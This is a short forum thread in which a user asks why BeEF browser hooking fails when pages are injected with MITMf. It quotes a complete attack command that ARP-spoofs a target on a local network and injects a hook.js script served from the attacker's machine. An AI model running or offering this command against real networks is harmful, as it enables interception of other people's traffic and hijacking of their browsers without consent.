Results 1 to 1 of 1

Thread: BeEF not working with MITMF

  1. #1
    Join Date
    2016-Apr
    Posts
    3

    BeEF not working with MITMF

    I am able to start beef service and access the panel. I am also able to execute the MITM command to have it inject all browser visited webpages to attempt to hook them but nothing happens. I have tried it on two different targets running two different versions of windows and each with IE, chrome, and Firefox, all non secure sites and still no hooks..

    Command I am using:
    Code:
     mitmf --spoof --arp -i wlan0 --gateway 192.168.1.1 --target 192.168.1.3 --inject --js-url http://192.168.1.2:3000/hook.js
    It then proceeds to log all the traffic it intercepts and it says it injects the malicious code when navigating on the target machine but never does it hook.

    EDIT:
    It seems theres a general error with beef itself as I get this everytime there is an attempt to hook.

    I tried updating beef, ruby, and nothing worked.

    Any help would be appreciated.
    Last edited by Wynt3r; 2016-04-16 at 11:33. Reason: Found possible general problem

Similar Threads

  1. Beef Stopped Working after update and upgrade
    By SDee in forum General Archive
    Replies: 2
    Last Post: 2016-03-16, 11:39

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •